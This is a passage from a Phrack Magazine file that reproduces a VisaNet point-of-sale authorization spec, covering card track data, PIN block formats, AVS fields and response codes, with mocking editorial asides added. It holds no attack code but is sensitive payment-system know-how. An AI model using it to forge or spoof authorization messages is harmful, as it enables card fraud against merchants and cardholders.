  11747.                                    TABLE 4.16
  11748.                         Cardholder Identification Codes
  11749.  
  11750.   ID CODE     IDENTIFICATION METHOD
  11751. --------------------------------------------------------------------------------
  11752.      A        Personal Identification Number-23 byte static key (non-USA) fnord
  11753.      B        PIN at Automated Dispensing Machine - 32 byte static key
  11754.      C        Self Svc Limited Amount Terminal (No ID method available)
  11755.      D        Self-Service Terminal            (No ID method available)
  11756.      E        Automated Gas Pump               (No ID method available)
  11757.      K        Personal Identification Number - 32 byte DUK/PT
  11758.      N        Customer Address via Address Verification Service (AVS)
  11759.      S        Personal Identification Number - 32 byte static key
  11760.      Z        Cardholder Signature - Terminal has a PIN pad
  11761.      @        Cardholder Signature - No PIN pad available
  11762. F-J,L,M,O-R   Reserved for future use
  11763.     T-Y
  11764. --------------------------------------------------------------------------------
  11765.  
  11766. 4.17 ACCOUNT DATA SOURCE
  11767.  
  11768. This field contains a one-character code defined by Visa and generated by the
  11769. terminal to indicate the source of the customer data entered in field 4.18.
  11770. Table 4.17 provides a summary of codes
  11771.  
  11772.                                    TABLE 4.17
  11773.                            Account Data Source Codes
  11774.  
  11775. ACCOUNT DATA
  11776. SOURCE CODE      ACCOUNT DATA SOURCE CODE DESCRIPTION
  11777. --------------------------------------------------------------------------------
  11778.      A           RESERVED - Bar-code read
  11779.      B           RESERVED - OCR read
  11780.      D           Mag-stripe read, Track 2
  11781.      H           Mag-stripe read, Track 1
  11782.      Q           RESERVED - Manually keyed, bar-code capable terminal
  11783.      R           RESERVED - Manually keyed, OCR capable terminal
  11784.      T           Manually keyed, Track 2 capable
  11785.      X           Manually keyed, Track 1 capable
  11786.      @           Manually keyed, terminal has no card reading capability
  11787. C,E-G,I-P,S,     RESERVED for future use
  11788. U-W,Y-Z,0-9
  11789. --------------------------------------------------------------------------------
  11790. NOTE:
  11791.    - If a dual track reading terminal is being used, be sure to enter the
  11792.      correct value of "D" or "H" for the magnetic data that is transmitted
  11793.    - When data is manually keyed at a dual track reading terminal, enter either
  11794.      a "T" or an "X"
  11795.  
  11796. 4.18 CUSTOMER DATA FIELD
  11797.  
  11798. This is a variable length field containing customer account or check acceptance
  11799. ID data in one of three formats.  The cardholder account information can be read
  11800. d from the card or it may be entered manually.  Additionally the terminal can be
  11801. used for check authorization processing with the check acceptance identification
  11802. number entered by the operator for transmission in this field.
  11803.  
  11804. NOTE: For all POS terminals operated under VISA U.S.A. Operating Regulations,
  11805. the following requirement must be available as an operating option if the
  11806. merchant location is found to be generating a disproportionately high percentage
  11807. of Suspect Transactions [lets get downright hostile about it] as defined in
  11808. chapter 9.10 of the VISA U.S.A. Operating Regulations.  Specifically, chapter
  11809. 9.10.B.2 requires that:
  11810.  
  11811.    - The terminal must read the track data using a magnetic stripe reading
  11812.      terminal
  11813.    - The terminal must prompt the wage slave to manually enter the last four
  11814.      digits of the account number
  11815.    - The terminal must compare the keyed data with the last four digits of the
  11816.      account number in the magnetic stripe
  11817.    - If the compare is successful, the card is acceptable to continue in the
  11818.      authorization process and the terminal must transmit the full, unaltered
  11819.      contents of the magnetic stripe in the authorization message.
  11820.    - If the compare fails, the card should not be honored at the Point of Sale
  11821.  
  11822. 4.18.1 TRACK 1 READ DATA
  11823.  
  11824. This is a variable length field with a maximum data length of 76 characters.
  11825.  
  11826. The track 1 data read from the cardholder's card is checked for parity and LRC
  11827. errors and then converted from the six-bit characters encoded on the card to
  11828. seven-bit characters as defined in ANSI X3.4.  The character set definitions are
  11829. provided in section 7 for reference.  As part of the conversion the terminal
  11830. will strip off the starting sentinel, ending sentinel, and LRC characters.  The
  11831. separators are to be converted to a "^" (HEX 5E) character.  The entire
  11832. track must be provided in the request message.  The character set and data
  11833. content are different between track 1 and track 2.  The data read by a track 2
  11834. device can not be correctly reformatted and presented as though it were read by
  11835. a track 1 device.  [aw shucks]  The converted data can not be modified by adding
  11836. or deleting non-framing characters and must be a one-for-one representation of
  11837. the character read from the track.
  11838.  
  11839. 4.18.2 TRACK 2 READ DATA
  11840.  
  11841. This is a variable length field with a maximum data length of 37 characters.
  11842.  
  11843. The track 2 data read from the cardholder's card is checked for parity and LRC
  11844. errors and then converted from the six-bit characters encoded on the card to
  11845. seven-bit characters as defined in ANSI X3.4.  The character set definitions are
  11846. provided in section 7 for reference.  As part of the conversion the terminal
  11847. will strip off the starting sentinel, ending sentinel, and LRC characters.  The
  11848. separators are to be converted to a  "^" (HEX 5E) character.  The entire
  11849. track must be provided in the request message.  The character set and data
  11850. content are different between track 2 and track 1.  The data read by a track 1
  11851. device can not be correctly reformatted and presented as though it were read by
  11852. a track 2 device.  The converted data can not be modified by adding or deleting
  11853. non-framing characters and must be a one-for-one representation of the character
  11854. read from the track. [repetitive? you bet]
  11855.  
  11856. 4.18.3 MANUALLY ENTERED ACCOUNT DATA (CREDIT CARD)
  11857.  
  11858. The customer credit card data may be key entered when the card can not be read,
  11859. when a card is not present, or when a card reader is not available.
  11860.  
  11861. 4.18.3.1 MANUALLY ENTERED ACCOUNT NUMBER
  11862.  
  11863. This is a variable length field consisting of 5 to 28 alphanumeric characters.
  11864.  
  11865. The embossed cardholder data, that is key entered, is validated by the terminal
  11866. using rules for each supported card type.  For example, both Visa and Master
  11867. Card include a mod 10 check digit as the last digit of the Primary Account
  11868. Number.  The Primary Account Number (PAN) is encoded as seven-bit characters
  11869. as defined in ANSI X3.4.  The PAN is then provided in the manually entered
  11870. record format provided in Table 3.01b.  The PAN must be provided without
  11871. embedded spaces.
  11872.  
  11873. 4.18.3.2 MANUALLY ENTERED EXPIRATION DATE
  11874.  
  11875. This four-digit field contains the card expiration date in the form MMYY (month-
  11876. month-year-year)
  11877.  
  11878. 4.18.4 CHECK ACCEPTANCE IDENTIFICATION NUMBER
  11879.  
  11880. The customer data may be card read or manually key entered for check acceptance
  11881. transactions.
  11882.  
  11883. 4.18.4.1 CHECK ACCEPTANCE ID
  11884.  
  11885. This field is a variable length field consisting of 1 to 28 alphanumeric
  11886. characters.  The check acceptance vendor will provide the data format and
  11887. validation rules to be used by the terminal.  Typically the ID consists of a
  11888. two-digit state code and an ID which may be the customer's drivers license
  11889. number.
  11890.  
  11891. 4.18.4.2 MANUALLY ENTERED CHECK ACCEPTANCE DATA
  11892.  
  11893. This six-character field contains the customer birth date or a control code in
  11894. the form specified by the check acceptance processor.
  11895.  
  11896. 4.19 FIELD SEPARATOR
  11897.  
  11898. The authorization record format specifies the use of the "FS" character.
  11899.  
  11900. 4.20 CARDHOLDER IDENTIFICATION DATA
  11901.  
  11902. This field will be 0, 23, 29 or 32 characters in length.  The cardholder ID
  11903. codes shown in Table 4.16 indicates the type of data in this field.  Table
  11904. 4.20 provides a brief summary of the current formats.
  11905.  
  11906.                                    TABLE 4.20
  11907.                    Cardholder Identification Data Definitions
  11908.  
  11909. CARDHOLDER                                                       VALUE(S) FROM
  11910. ID LENGTH     DESCRIPTION                                          TABLE 4.16
  11911. --------------------------------------------------------------------------------
  11912.    0          Signature ID used, No PIN pad is present             @,C,D or E
  11913.    0          Signature ID used on a terminal with a PIN pad           Z
  11914.   23          A PIN was entered on a STATIC key PIN pad                A
  11915.   32          A PIN was entered on a STATIC key PIN pad                B
  11916.   32          A PIN was entered on a DUK/PT key PIN pad                K
  11917.   32          A PIN was entered on a STATIC key PIN pad                S
  11918. 0 to 29       AVS was requested                                        N
  11919. --------------------------------------------------------------------------------
  11920.  
  11921. 4.20.1 STATIC KEY WITH TWENTY THREE BYTE CARDHOLDER ID
  11922.  
  11923. NOTE: The 23 byte static key technology is NOT approved for use in terminals
  11924. deployed in the Visa U.S.A. region.  [thanks nsa!]
  11925.  
  11926. When a PIN is entered on a PIN pad supporting 23 byte static key technology, the
  11927. terminal will generate the following data:
  11928.  
  11929.    1JFxxyyaaaaaaaaaaaaaaaa
  11930.  
  11931.    Where:
  11932.         1J   Header - PIN was entered
  11933.  
  11934.         f    Function Key Indicator - A single byte indicating which, if any,
  11935.              function key was pressed on the PIN pad.  This field is currently
  11936.              not edited.  Any printable character is allowed.
  11937.  
  11938.         xx   PIN Block Format - These two numeric bytes indicate the PIN
  11939.              encryption method used to create the encrypted PIN block.  Visa
  11940.              currently supports four methods; 01, 02, 03, & 04.  For more
  11941.              information, please refer to the VisaNet Standards Manual, Card
  11942.              Technology Standards, PIN and Security Standards, Section 2,
  11943.              Chapter 3, PIN Block Formats
  11944.  
  11945.         aaaaaaaaaaaaaaaa   Expanded Encrypted PIN Block Data - The encrypted
  11946.              PIN block format consists of 64 bits of data.  Since the VisaNet
  11947.              Second Generation protocol allows only printable characters in
  11948.              data fields, these 64 bits must be expanded to ensure that no
  11949.              values less than hex "20" are transmitted.  To expand the 64 bit
  11950.              encrypted PIN block, remove four bits at a time and convert them
  11951.              to ANSI X3.4 characters using Table 4.20.  After this conversion,
  11952.              the 64 bit encrypted PIN block will consist of 16 characters that
  11953.              will be placed in the Expanded Encrypted PIN Block Data field.
  11954.  
  11955. 4.20.2 STATIC KEY WITH THIRTY TWO BYTE CARDHOLDER ID
  11956.  
  11957. When a PIN is entered on a PIN pad supporting 32 byte static key technology,
  11958. the terminal will generate the following data:
  11959.  
  11960.        aaaaaaaaaaaaaaaa2001ppzz00000000
  11961.  
  11962.       Where:
  11963.          aaaaaaaaaaaaaaaa - Expanded Encrypted PIN Block Data - The encrypted
  11964.               PIN block format consists of 64 bits of data.  Since the
  11965.               VisaNet Second Generation protocol allows only printable
  11966.               characters in data fields, these 64 bits must be expanded to
  11967.               ensure that no values less than hex "20" are transmitted.  To
  11968.               expand the 64 bit encrypted PIN block, remove four bits at a
  11969.               time and convert them to ANSI X3.4 characters using table 4.20.
  11970.               After this conversion, the 64 bit encrypted PIN block will
  11971.               consist of 16 characters that will be placed in the Expanded
  11972.               Encrypted PIN Block Data field.
  11973.  
  11974.          20 - Security Format Code - This code defines that the Zone
  11975.               Encryption security technique was used.
  11976.  
  11977.          01 - PIN Encryption Algorithm Identifier - This code defines that the
  11978.               ANSI DES encryption technique was used.
  11979.  
  11980.          pp - PIN Block Format Code - This code describes the PIN block format
  11981.               was used by the acquirer.  Values are:
  11982.                  01 - Format is based on the PIN, the PIN length, selected
  11983.                       rightmost digits of the account number and the pad
  11984.                       characters "0" and "F"; combined through an exclusive
  11985.                       "OR" operation.
  11986.                  02 - Format is based on the PIN, the PIN length and a user
  11987.                       specified numeric pad character.
  11988.                  03 - Format is based on the PIN and the "F" pad character.
  11989.                  04 - Format is the same as "01" except that the leftmost
  11990.                       account number digits are selected.
  11991.  
  11992.          zz - Zone Key Index - This index points to the zone key used by the
  11993.               acquirer to encrypt the PIN block.  Values are:
  11994.                  01 - First key
  11995.                  02 - Second key
  11996.  
  11997.          00000000 - Visa Reserved - Must be all zeros
  11998.  
  11999. For additional information, refer to the VisaNet manual V.I.P. System, Message
  12000. Formats, Section B: Field Descriptions.  Specifically, fields 52 and 53;
  12001. Personal Identification Number (PIN) Data and Security Related Control
  12002. Information respectively.
  12003.  
  12004. 4.20.3 DUK/PT KEY WITH THIRTY TWO BYTE CARDHOLDER ID
  12005.  
  12006. When a PIN is entered on a PIN pad supporting DUK/PT technology, the terminal
  12007. will generate the following 32 bytes:
  12008.  
  12009.      aaaaaaaaaaaaaaaakkkkkkssssssssss
  12010.  
  12011.      Where:
  12012.          aaaaaaaaaaaaaaaa - Expanded Encrypted PIN Block Data - The encrypted
  12013.               PIN block format consists of 64 bits of data.  Since the
  12014.               VisaNet Second Generation protocol allows only printable
  12015.               characters in data fields, these 64 bits must be expanded to
  12016.               ensure that no values less than hex "20" are transmitted.  To
  12017.               expand the 64 bit encrypted PIN block, remove four bits at a
  12018.               time and convert them to ANSI X3.4 characters using table 4.20.
  12019.               After this conversion, the 64 bit encrypted PIN block will
  12020.               consist of 16 characters that will be placed in the Expanded
  12021.               Encrypted PIN Block Data field.  [repetitive? you bet]
  12022.  
  12023.          kkkkkk - Key Set Identifier (KSID) - Is represented by a unique, Visa
  12024.               Visa assigned, six digit bank identification number.
  12025.  
  12026.          ssssssssss - Expanded TRSM ID (PIN Pad Serial Number) & Expanded
  12027.               Transaction Counter - Is represented by the concatenation of these
  12028.               two hexadecimal fields.  The PIN pad serial number is stored as
  12029.               five hex digits minus one bit for a total of 19 bits of data.  The
  12030.               transaction counter is stored as five hex digits plus one bit for
  12031.               a total of 21 bits of data.  These two fields concatenated
  12032.               together will contain 40 bits.  Since the VisaNet Second
  12033.               Generation protocol allows only printable characters in data
  12034.               fields, these 40 bits must be expanded to ensure that no values
  12035.               less than hex "20" are transmitted.  To expand this 40 bit field,
  12036.               remove four bits at a time and convert them to ASCII characters
  12037.               using table 4.20.  After this conversion, this 40 bit field will
  12038.               consist of 10 characters that will be placed in the Expanded
  12039.               TRSM ID & Expanded Transaction Counter Field.
  12040.  
  12041.                                    TABLE 4.20
  12042.                            PIN Block conversion Table
  12043.  
  12044.                        HEXADECIMAL   |    ANSI X3.4
  12045.                           DATA       |    CHARACTER
  12046.                        --------------+----------------
  12047.                           0000       |        0
  12048.                           0001       |        1
  12049.                           0010       |        2
  12050.                           0011       |        3
  12051.                           0100       |        4
  12052.                           0101       |        5
  12053.                           0110       |        6
  12054.                           0111       |        7
  12055.                           1000       |        8
  12056.                           1001       |        9
  12057.                           1010       |        A
  12058.                           1011       |        B
  12059.                           1100       |        C
  12060.                           1101       |        D
  12061.                           1110       |        E
  12062.                           1111       |        F
  12063.                        -------------------------------
  12064.  
  12065. 4.20.4 ADDRESS VERIFICATION SERVICE DESCRIPTION [ah enlightenment]
  12066.  
  12067. When Address Verification Service is requested, this field will contain the
  12068. mailing address of the cardholder's monthly statement.  The format of this
  12069. field is:
  12070.                       <street address><apt no.><zip code>
  12071.                                        or
  12072.                        <post office box number><zipcode>
  12073.  
  12074. Numbers are not spelled out.  ("First Street" becomes "1ST Street", "Second"
  12075. becomes "2ND", etc)  "Spaces" are only required between a numeral and the ZIP
  12076. code.  For instance:
  12077.                              1391 ELM STREET 40404
  12078.      is equivalent to:       1931ELMSTREET40404
  12079.  
  12080.                              P.O. Box 24356 55555
  12081.      is not equivalent to    P.O.BOX2435655555
  12082.  
  12083. If a field is not available or not applicable, it may be skipped.  If nine
  12084. digits are available, the last five digits should always be used to pour more
  12085. sand into the wheels of progress.
  12086.  
  12087. 4.21 FIELD SEPARATOR
  12088.  
  12089. The authorization record format specifies the use of the "FS" character.                              ==Phrack Magazine==
  12090.  
  12091.                  Volume Five, Issue Forty-Six, File 16 of 28
  12092.  
  12093. ****************************************************************************
  12094.  
  12095.                         VisaNet Operations (Continued)
  12096.  
  12097. 4.22 TRANSACTION AMOUNT
  12098.  
  12099. This is a variable field from three to twelve digits in length.  The transaction
  12100. amount includes the amount in 4.28, Secondary Amount.  Therefore, field 4.22
  12101. must be greater than or equal to field 4.28.
  12102.  
  12103. The transaction amount is presented by the terminal with an implied decimal
  12104. point.  For example $.01 would be represented in the record as "001".  When the
  12105. terminal is used with an authorization system which supports the US dollar as
  12106. the primary currency, the amount field must be limited to seven digits
  12107. (9999999). [...]  The terminal may be used with authorization system which
  12108. support other currencies that require the full twelve-digit field.
  12109.  
  12110. 4.23 FIELD SEPARATOR
  12111.  
  12112. The authorization record format specifies the use of the "FS" character.
  12113.  
  12114. 4.24 DEVICE CODE/INDUSTRY CODE
  12115.  
  12116. This field is used to identify the device type which generated the transaction
  12117. and the industry type of the merchant.  Table 4.24 provides a brief summary of
  12118. the current codes.
  12119.  
  12120.                                    TABLE 4.24
  12121.                            Device Code/Industry Code
  12122.  
  12123. C                                      C
  12124. O                                      O
  12125. D                                      D
  12126. E          DEVICE TYPE                 E            INDUSTRY TYPE
  12127. -------------------------------------------------------------------------------
  12128. 0   Unknown or Unsure                  0   Unknown or Unsure
  12129. 1          RESERVED                    1              RESERVED
  12130. 2          RESERVED                    2              RESERVED
  12131. 3          RESERVED                    3              RESERVED
  12132. 4          RESERVED                    4              RESERVED
  12133. 5          RESERVED                    5              RESERVED
  12134. 6          RESERVED                    6              RESERVED
  12135. 7          RESERVED                    7              RESERVED
  12136. 8          RESERVED                    8              RESERVED
  12137. 9          RESERVED                    9              RESERVED
  12138. A          RESERVED                    A              RESERVED
  12139. B          RESERVED                    B   Bank/Financial Institution
  12140. C   P.C.                               C              RESERVED
  12141. D   Dial Terminal                      D              RESERVED
  12142. E   Electronic Cash Register (ECR)     E              RESERVED
  12143. F          RESERVED                    F   Food/Restaurant
  12144. G          RESERVED                    G   Grocery Store/Supermarket
  12145. H          RESERVED                    H   Hotel
  12146. I   In-Store Processor                 I              RESERVED
  12147. J          RESERVED                    J              RESERVED
  12148. K          RESERVED                    K              RESERVED
  12149. L          RESERVED                    L              RESERVED
  12150. M   Main Frame                         M   Mail Order
  12151. N          RESERVED                    N              RESERVED
  12152. O          RESERVED                    O              RESERVED
  12153. P   POS-port                           P              RESERVED
  12154. Q       RESERVED for POS-port          Q              RESERVED
  12155. R          RESERVED                    R   Retail
  12156. S          RESERVED                    S              RESERVED
  12157. T          RESERVED                    T              RESERVED
  12158. U          RESERVED                    U              RESERVED
  12159. V          RESERVED                    V              RESERVED
  12160. W          RESERVED                    W              RESERVED
  12161. X          RESERVED                    X              RESERVED
  12162. Y          RESERVED                    Y              RESERVED
  12163. Z          RESERVED                    Z              RESERVED
  12164. --------------------------------------------------------------------------------
  12165.  
  12166. 4.25 FIELD SEPARATOR
  12167.  
  12168. The authorization record format specifies the use of the "FS" character.
  12169.  
  12170. 4.26 ISSUING INSTITUTION ID/RECEIVING INSTITUTION ID
  12171.  
  12172. This six-digit field is provided by the merchant signing member and is present
  12173. when the terminal is used to process transactions which can not be routed using
  12174. the cardholder Primary Account Number.  When a value is present in this field,
  12175. it is used as an RIID for all valid transaction codes, field 4.12, except 81
  12176. through 88.  This field is used as an IIID for transaction codes 81 through 88.
  12177. Table 4.26 provides a summary of the RIID codes for check acceptance.
  12178.  
  12179.                                    TABLE 4.26
  12180.                           Check Acceptance RIID Values
  12181.  
  12182.                          Vendor                 RIID
  12183.                          ---------------------------
  12184.                          JBS, Inc             810000
  12185.                          Telecheck            861400
  12186.                          TeleCredit, West     894300 [note; telecredit has been
  12187.                          TeleCredit, East     894400  mutated/eaten by equifax]
  12188.                          ---------------------------
  12189.  
  12190. 4.27 FIELD SEPARATOR
  12191.  
  12192. The authorization record format specifies the use of the "FS" character.
  12193.  
  12194. 4.28 SECONDARY AMOUNT (CASHBACK)
  12195.  
  12196. NOTE: "Cashback" is NOT allowed on Visa cards when the Customer Data Field,
  12197. see section 4.18, has been manually entered.
  12198.  
  12199. This is a variable length field from three to twelve digits in length.  The
  12200. Secondary Amount is included in field 4.22, Transaction Amount.
  12201.  
  12202. The secondary amount is presented by the terminal with an implied decimal point.
  12203. For example $.01 would be represented in the record as "001".  This field will
  12204. contain 000 when no secondary amount has been requested.  Therefore, when the
  12205. terminal is used with an authorization system which supports the US dollar as
  12206. the primary currency, the secondary amount field must be limited to seven
  12207. digits (9999999).  The terminal may be used with authorization systems which
  12208. support other currencies that require the full twelve-digit field.
  12209.  
  12210. 4.29 FIELD SEPARATOR
  12211.  
  12212. The authorization record format specifies the use of the "FS" character.
  12213.  
  12214. 4.30 MERCHANT NAME
  12215.  
  12216. This 25-character field contains the merchant name provided by the signing
  12217. member.  the name must correspond to the name printed on the customer receipt.
  12218. The name is left justified with space fill.  The first character position can
  12219. not be a space.  This field must contain the same used in the data capture
  12220. batch.
  12221.  
  12222. 4.32 MERCHANT STATE
  12223.  
  12224. This two-character field contains the merchant location state abbreviation
  12225. provided by the singing member.  The abbreviation must correspond to the state
  12226. name printed on the customer receipt and be one of the Visa accepted
  12227. abbreviations.  This field must contain the same data used in the data capture
  12228. batch.
  12229.  
  12230. 4.33 SHARING GROUP
  12231.  
  12232. This one to fourteen-character field contains the group of debit card/network
  12233. types that a terminal may have access to and is provided by the singing member.
  12234. The values must correspond to one of the Visa assigned debit card /network
  12235. types.  This data is part of the VisaNet debit data.
  12236.  
  12237. 4.34 FIELD SEPARATOR
  12238.  
  12239. The authorization record format specifies the use of the "FS" character.
  12240.  
  12241. 4.35 MERCHANT ABA NUMBER
  12242.  
  12243. This fixed length field is twelve digits in length.  If this field is not used,
  12244. its length must be zero.  If this field is not used, the following field must
  12245. also be empty.
  12246.  
  12247. This number identifies the merchant to a debit switch provided by the signing
  12248. member.  The number is provided by the signing member.
  12249.  
  12250. 4.36 MERCHANT SETTLEMENT AGENT NUMBER
  12251.  
  12252. This fixed length field is four digits in length.  If this field is not used,
  12253. its length must be zero.  If this field is not used, the previous field must
  12254. also be empty.
  12255.  
  12256. This number identifies the merchant settling agent.  The number is provided by
  12257. the signing member.
  12258.  
  12259. 4.37 FIELD SEPARATOR
  12260.  
  12261. The authorization record format specifies the use of the "FS" character.
  12262.  
  12263. 4.38 AGENT NUMBER
  12264.  
  12265. This six-digit field contains an agent number assigned by the signing member.
  12266. The number identifies an institution which signs merchants as an agent of a
  12267. member.  The member uses this number to identify the agent within the member
  12268. systems.  The acquirer BIN, Agent, Chain, Merchant, Store, and Terminal numbers
  12269. are required to uniquely identify a terminal within the VisaNet systems.
  12270.  
  12271. 4.39 CHAIN NUMBER
  12272.  
  12273. This six-digit field contains a merchant chain identification number assigned
  12274. by the singing member.  The member uses this number to identify the merchant
  12275. chain within the member systems.  The acquirer BIN, Agent, Chain, Merchant,
  12276. Store, and Terminal numbers are required to uniquely identify a terminal within
  12277. the VisaNet systems.
  12278.  
  12279. 4.40 BATCH NUMBER
  12280.  
  12281. This three-digit field contains a batch sequence number generated by the
  12282. terminal.  The number will wrap from 999 to 001.  This number is that data
  12283. capture batch number.
  12284.  
  12285. 4.41 REIMBURSEMENT ATTRIBUTE
  12286.  
  12287. This is a single character fixed length field.
  12288.  
  12289. This field contains the reimbursement attribute assigned by the singing member.
  12290. This field must be a "space".
  12291.  
  12292. 4.42 FIELD SEPARATOR
  12293.  
  12294. The authorization record format specifies the use of the "FS" character.
  12295.  
  12296. 4.43 APPROVAL CODE
  12297.  
  12298. This contains a six-character fixed length field.
  12299.  
  12300. This field is only present in cancel transactions and contains the original
  12301. approval code from the original transaction.
  12302.  
  12303. The approval code was returned in the authorization response of the transaction
  12304. to be canceled.
  12305.  
  12306. 4.44 SETTLEMENT DATE
  12307.  
  12308. This contains a four-digit fixed length field.
  12309.  
  12310. This field is only present in cancel transactions and contains the settlement
  12311. date from the original transaction and is in the format MMDD.
  12312.  
  12313. The settlement date was returned in the authorization response of the
  12314. transaction to be canceled.
  12315.  
  12316. 4.45 LOCAL TRANSACTION DATE
  12317.  
  12318. This contains a four-digit fixed length field.
  12319.  
  12320. This field is only present in cancel transactions and contains the transaction
  12321. date from the original transaction and is in the format MMDD.
  12322.  
  12323. The transaction date was returned in the authorization response of the
  12324. transaction to be canceled as MMDDYY.
  12325.  
  12326. 4.46 LOCAL TRANSACTION TIME
  12327.  
  12328. This contains a six-digit fixed length field.
  12329.  
  12330. This field is only present in cancel transactions and contains the transaction
  12331. time from the original transaction and is in the format HHMMSS.
  12332.  
  12333. The transaction time was returned in the authorization response of the
  12334. transaction to be canceled.
  12335.  
  12336. 4.47 SYSTEM TRACE AUDIT NUMBER
  12337.  
  12338. This contains a six-character fixed length field.
  12339.  
  12340. This field is only present in cancel transactions and contains the trace audit
  12341. number from the original transaction.
  12342.  
  12343. The trace audit number was returned in the authorization response of the
  12344. transaction to be canceled.
  12345.  
  12346. 4.48 ORIGINAL AUTHORIZATION TRANSACTION CODE
  12347.  
  12348. The field is a two-character fixed length field and must contain the original
  12349. AUTHORIZATION TRANSACTION CODE (filed 4.12) of the transaction to be canceled.
  12350. Currently, the only transaction that can be canceled in an Interlink Debit
  12351. Purchase.
  12352.  
  12353. 4.49 NETWORK IDENTIFICATION CODE
  12354.  
  12355. This contains a single character fixed length field.
  12356.  
  12357. This field is only present in cancel transactions and contains the network ID
  12358. from the original transaction.
  12359.  
  12360. The network ID was returned in the authorization response of the transaction to
  12361. be canceled.
  12362.  
  12363. 4.50 FIELD SEPARATOR
  12364.  
  12365. The authorization record format specifies the use of the "FS" character.
  12366.  
  12367. 5.0 RESPONSE RECORD DATA ELEMENT DEFINITIONS
  12368.  
  12369. The following subsections will define the authorization response record data
  12370. elements.
  12371.  
  12372. 5.01 PAYMENT SERVICE INDICATOR
  12373.  
  12374. This field contains the one-character payment service indicator.  It must be
  12375. placed in the batch detail record for terminals that capture.
  12376.  
  12377. Table 5.01 provides a summary of current Values.
  12378.  
  12379.                                    TABLE 5.01
  12380.                         Payment Service Indicator Values
  12381.  
  12382.         VALUE   DESCRIPTION
  12383.         ------------------------------------------------------------------
  12384.           A     REPS qualified
  12385.           Y     Requested a "Y" in field 4.14 and there was a problem
  12386.                 REPS denied (VAS edit error or BASE I reject)
  12387.           N     Requested an "N" in field 4.14 or requested a "Y" in field
  12388.                 4.14 and request was downgraded (by VAS)
  12389.         space   If "Y" sent and transaction not qualified  (VAS downgrade)
  12390.         -------------------------------------------------------------------
  12391.  
  12392. 5.02 STORE NUMBER
  12393.  
  12394. This four-digit number is returned by VisaNet from the authorization request for
  12395. formats "J" and "G", and can be used to route the response within a store
  12396. controller and/or a store concentrator.
  12397.  
  12398. 5.03 TERMINAL NUMBER
  12399.  
  12400. This four-digit number is returned by VisaNet from the authorization request for
  12401. formats "J" and "G", and can be used to route the response within a store
  12402. controller and/or a store concentrator.
  12403.  
  12404. 5.04 AUTHORIZATION SOURCE CODE
  12405.  
  12406. This field contains a one-character code that indicates the source of the
  12407. authorization.  The received code must be placed in the data capture detail
  12408. transaction record when data capture is enabled.
  12409.  
  12410. Table 5.04 provides a summary of current codes.
  12411.  
  12412.                                    TABLE 5.04
  12413.                            Authorization Source Codes
  12414.  
  12415.  Code   Description
  12416. --------------------------------------------------------------------------------
  12417.   1     STIP: time-out response
  12418.   2     LCS: amount below issuer limit
  12419.   3     STIP: issuer in Suppress-Inquiry mode
  12420.   4     STIP: issuer unavailable
  12421.   5     Issuer approval
  12422.   6     Off-line approval, POS device generated
  12423.   7     Acquirer approval: BASE I unavailable
  12424.   8     Acquirer approval of a referral
  12425.   9     Use for non-authorized transactions; such as credit card credits [yum!]
  12426.   D     Referral: authorization code manually keyed
  12427.   E     Off-line approval: authorization code manually keyed
  12428. --------------------------------------------------------------------------------
  12429.  
  12430. 5.05 TRANSACTION SEQUENCE NUMBER
  12431.  
  12432. This field contains the four-digit code which was generated by the terminal as
  12433. the sequence number for the transaction and passed to the authorization center
  12434. in the authorization request record.  The sequence number can be used by the
  12435. terminal to match request and response messages.  The transaction sequence
  12436. number is returned by VisaNet without sequence verification.
  12437.  
  12438. 5.06 RESPONSE CODE
  12439.  
  12440. This field contains a two-character response code indicating the status of the
  12441. authorization.
  12442.  
  12443. Table 5.06 provides the response codes for formats "J" and "G".  A response code
  12444. of "00" represents an approval.  A response code of "85" represents a successful
  12445. card verification returned by TRANSACTION CODES 58, 68, and 88.  All other
  12446. response codes represent a non-approved request.
  12447.  
  12448. The value returned is stored in the batch transaction detail record for
  12449. terminals that capture.
  12450.  
  12451.                                    TABLE 5.06
  12452.            Authorization Response Codes For Record Formats "J" & "G"
  12453.  
  12454.   Authorization     Response                                        AVS Result
  12455.  Response Message     Code       Response Definition                   Code
  12456. --------------------------------------------------------------------------------
  12457.    EXACT MATCH         00        Exact Match, 9 digit zip               X
  12458.    EXACT MATCH         00        Exact Match, 5 digit zip GRIND         Y
  12459.   ADDRESS MATCH        00        Address match only                     A
  12460.     ZIP MATCH          00        9-digit zip match only                 W
  12461.     ZIP MATCH          00        5-digit zip match only GRIND           Z
  12462.      NO MATCH          00        No address or zip match                N
  12463.  VER UNAVAILABLE       00        Address unavailable                    U
  12464.       RETRY            00        Issuer system unavailable              R
  12465.  ERROR INELIGIBLE      00        Not a mail/phone order                 E
  12466.  SERV UNAVAILABLE      00        Service not supported                  S
  12467.     APPROVAL           00        Approved and completed              see above
  12468.      CARD OK           85        No reason to decline                see above
  12469.       CALL             01        Refer to issuer                        0
  12470.       CALL             02        Refer to issue - Special condition     0
  12471.     NO REPLY           28        File is temporarily unavailable        0
  12472.     NO REPLY           91        Issuer or switch is unavailable        0
  12473.     HOLD-CALL          04        Pick up card                           0
  12474.     HOLD-CALL          07        Pick up card - Special condition       0
  12475.     HOLD-CALL          41        Pick up card - Lost                    0
  12476.     HOLD-CALL          43        Pick up card - Stolen                  0
  12477.  ACCT LENGTH ERR       EA        Verification Error                     0
  12478.  ALREADY REVERSED      79        Already Reversed at Switch [ya got me] 0
  12479.    AMOUNT ERROR        13        Invalid amount                         0
  12480.   CAN'T VERIFY PIN     83        Can not verify PIN                     0
  12481.    CARD NO ERROR       14        Invalid card number                    0
  12482.   CASHBACK NOT APP     82        Cashback amount not approved           0
  12483.    CHECK DIGIT ERR     EB        Verification Error                     0
  12484.   CID FORMAT ERROR     EC        Verification Error                     0
  12485.      DATE ERROR        80        Invalid Date                           0
  12486.       DECLINE          05        Do not honor                           0
  12487.       DECLINE          51        Not Sufficient Funds                   0
  12488.       DECLINE          61        Exceeds Withdrawal Limit               0
  12489.       DECLINE          65        Activity Limit Exceeded                0
  12490.  ENCRYPTION ERROR      81        Cryptographic Error                    0
  12491.       ERROR xx         06        General Error                          0
  12492.      ERROR xxxx        06        General Error                          0
  12493.     EXPIRED CARD       54        Expired Card                           0
  12494.   INVALID ROUTING      98        Destination Not Found                  0
  12495.    INVALID TRANS       12        Invalid Transaction                    0
  12496.   NO CHECK ACCOUNT     52        No Check Account                       0
  12497.   NO SAVE ACCOUNT      54        No Save Account                        0
  12498.    NO SUCH ISSUER      15        No Such Issuer                         0
  12499.       RE ENTER         19        Re-enter Transaction                   0
  12500.     SEC VIOLATION      63        Security Violation                     0
